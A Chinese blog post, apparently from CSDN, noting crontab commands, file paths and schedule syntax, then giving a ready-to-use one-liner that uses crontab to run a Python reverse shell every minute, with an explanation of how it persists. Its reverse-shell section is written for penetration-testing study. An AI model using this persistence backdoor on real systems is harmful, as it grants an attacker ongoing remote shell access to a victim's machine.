1. 编辑定时任务

crontab -e

linux通用路径:/etc/crontab

ubuntu被编辑的文件路径一般为:/var/spool/cron/crontabs/当前用户

centos被编辑的文件路径一般为:/var/spool/cron/当前用户

2. 删除定时任务(情况)

crontab -r

3. 查看现有定时任务

crontab -l

4. crountab 定时任务规则编写

*/5 * * * * Command                       每5分钟执行一次命令5 * * * * Command                         每小时的第5分钟执行一次命令
30 18 * * * Command                     指定每天下午的 6:30 执行一次命令
30 7 8 * * Command                      指定每月8号的7:30分执行一次命令
30 5 8 6 * Command                     指定每年的6月8日5:30执行一次命令
30 6 * * 0 Command                      指定每星期日的6:30执行一次命令

5. 反弹shell

可能大家平时比较少人ubuntu,所以不大知道这个特性

测试结果:

/etc/crontab和/var/spool/cron/crontabs/,bash -i反弹shell都失败。不过python,perl可以,centos和ubuntu都自带python,perl。

Python

执行以下命令,以当前bash权限用户,创建一个crontab文件

(crontab -l;printf " * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'n")|crontab -

代码说明:

crontab -将管道符前面的内容写入到当前用户的crontab文件里

  • 表示每一分钟执行该命令,等同于/1 *
    如果是ubuntu的root权限,以上命令会写到/var/spool/cron/crontabs/root文件

如果是centos的root权限,以上命令会写到/var/spool/cron/root, 执行成功后,相应的crontab文件会创建或者追加如下内容

* * * * *  /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash

crontab命令使用记录(精,反弹shell)相关推荐

  1. linux nc反弹命令,详解NC反弹shell的几种方法

    假如ubuntu.centos为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu.centos的shell反弹到kali上 正向 ...

  2. 反弹shell bash -i命令

    目录   0x01 什么是反弹shell?   0x02 命令拆分详解   0x03 文件描述符   0x04 shell 输入/输出重定向   0x05 输入输出结合获得shell 什么是反弹she ...

  3. 反弹shell和键盘记录器实现

      环境:win10(测试机),阿里云服务器(服务端) 另附:从局域网监控到广域网实时监控的实现     反弹shell(reverse shell),就是控制端监听在某 TCP/UDP 端口,被控端 ...

  4. 常用的一句话反弹shell总结

    目录 常用的一句话反弹shell总结 1. bash直接反弹 2. python一句话反弹shell 3. python脚本反弹shell 4. php一句话反弹shell 5. php脚本反弹she ...

  5. centos7输入shell找不到命令_反弹shell原理与实现

    什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端.reverse shell与tel ...

  6. Windows nc命令下载使用与使用bash建立反弹shell

    今天继续给大家介绍渗透测试相关知识,本文主要内容是Windows nc命令下载使用与使用bash建立反弹shell. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造 ...

  7. bulldog-1靶机 write up 源码 MD5解密得到密码到后台 命令执行绕过 反弹shell string分析文件得到密码提权

    bulldog-1靶机 write up 0x00 环境搭建 0x01 信息收集 0x02 漏洞挖掘 web漏洞思路 ssh 利用思路 步骤一:浏览网页 爆破目录 步骤二: 破解hash 步骤三:利用 ...

  8. 反弹Shell命令一键生成工具

     工具下载方式:反弹Shell命令一键生成工具https://mp.weixin.qq.com/s/ckUvd6Ayw27TLJ5GH1bZ6A

  9. php 端口反弹,详解反弹shell命令

    在渗透过程中,经常需要反弹shell,因此总结一下linux反弹shell的几种姿势: bash -i >&  /dev/tcp/ip/port 0>&1 bash -i  ...

最新文章

  1. c语言程序设计A课程试,自学考试有关论文范文,与C语言程序设计A课程辅导相关硕士毕业论文范文...
  2. 极速搭建一个个人博客网站
  3. python 列表、字典多排序问题
  4. ENSP配置 实例二 单臂路由配置
  5. 这个 Python 代码自动补全神器搞得我卧槽卧槽的
  6. linux该专接本还是工作_2020河北专接本报考录取比例相差最大专业TOP榜,出乎意料吗?...
  7. C语言丨定积分的近似计算
  8. SQL Server 2008 评估期已过解决方法
  9. 惠斯通电桥信号调理芯片_变频器通电后无反应,如何检查维修?
  10. android报错自动重启,Android Studio常见报错及处理办法
  11. c语言程序设计全文阅读,C语言程序设计(谭浩强).doc
  12. linux创建2g文件,嵌入式 创建一个2G的空文件(Linux命令dd)
  13. 计算机英语潘雪峰,《小学三年级英语听力训练指导策略的研究》研究报告
  14. jsp内置对象request
  15. POJ 3744 Scout YYF I:概率dp
  16. c语言 2个字节字符串,【单选题】在C语言中,字符型数据所占的内存空间是 A. 2 个字节 B. 4 个字节 C. 1 个字节 D. 由用户自定义...
  17. Linux ARM平台开发系列讲解(摄像头V4L2子系统) 2.12.4 V4L2子设备操作函数结构体分析
  18. 通达信缠论顶底分型选股公式(一笔优化版)
  19. spss和python哪个好用_数据分析5大软件PK,你最爱哪个?
  20. GoLang之使用sync.Cond

热门文章

  1. Linux学习 - sed使用
  2. 亲测有效!解决macOS Big Sur系统Parallels Desktop 16的USB无法使用和无法联网问题
  3. APP、智能设备、平台账号等信息系统,实现无密码登录的可行性方案。
  4. java断言错误_java-获取断言错误,即使期望值和实际值相同
  5. swing中怎么在原来图片的基础上切换第二张图片_摄影比赛原来是这么评出来的!照片点评与修图小赛第10期...
  6. Js获取字符串的显示宽度/高度
  7. Node.js笔记-使用nodejs-websocket构建WebSocket服务
  8. C++设计模式-组合模式
  9. STL|QTL工作笔记-QString与std::string寻找子串的区别与联系
  10. Qt实现全屏下玫瑰花(含详细注释)